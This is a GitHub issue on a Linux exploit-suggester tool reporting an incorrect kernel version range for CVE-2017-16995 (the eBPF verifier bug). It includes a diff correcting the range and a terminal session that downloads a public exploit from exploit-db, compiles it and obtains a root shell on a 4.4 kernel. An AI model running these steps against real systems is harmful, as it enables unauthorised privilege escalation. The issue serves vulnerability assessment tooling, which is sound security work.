[CVE-2017-16995] Incorrect kernel version check
bcoles opened this issue · 2 comments
bcoles commented
It appears the kernel version check for CVE-2017-16995 is incorrect.
As an example, on a vulnerable Linux Mint 18 kernel 4.4.0-116-generic system:
user@mint-18 ~/Desktop/linux-exploit-suggester $ uname -r
4.4.0-116-generic
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
user@mint-18 ~/Desktop/linux-exploit-suggester $ fg
vi linux-exploit-suggester.sh
[1]+ Stopped vi linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh
index e9c88d4..cad912c 100755
--- a/linux-exploit-suggester.sh
+++ b/linux-exploit-suggester.sh
@@ -688,7 +688,7 @@ EOF
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
-Reqs: pkg=linux-kernel,ver>=4.9,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
+Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=16.04.4(kernel:4.4.0-116)
analysis-url: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
[+] [CVE-2017-16995] eBPF_verifier
Details: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
The 4.4.0-116-generic kernel on Ubuntu and Linux Mint is confirmed vulnerable to the exploit:
user@mint-18 ~/Desktop/linux-exploit-suggester $ wget 'https://www.exploit-db.com/download/44298'
--2018-03-25 15:32:03-- https://www.exploit-db.com/download/44298
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [application/txt]
Saving to: '44298’
44298 100%[=====================================================>] 5.88K --.-KB/s in 0s
2018-03-25 15:32:04 (1.06 GB/s) - '44298’ saved [6021/6021]
user@mint-18 ~/Desktop/linux-exploit-suggester $ mv 44298 44298.c
user@mint-18 ~/Desktop/linux-exploit-suggester $ gcc 44298.c
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./a.out
task_struct = ffff880036c23800
uidptr = ffff880038381c04
spawning root shell
mint-18 linux-exploit-suggester # id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),130(sambashare),1000(user)
It seems there some confusion over the CVEs. For example, the following sources provide conflicting information on the affected kernels:
- https://www.securityfocus.com/bid/102288
- http://openwall.com/lists/oss-security/2017/12/21/2
- https://usn.ubuntu.com/3523-2/
Regardless, the specified exploit works on the 4.4 kernel.
bcoles commented
Appears the bug was backported to 4.4 kernel:
mzet- commented
Thanks.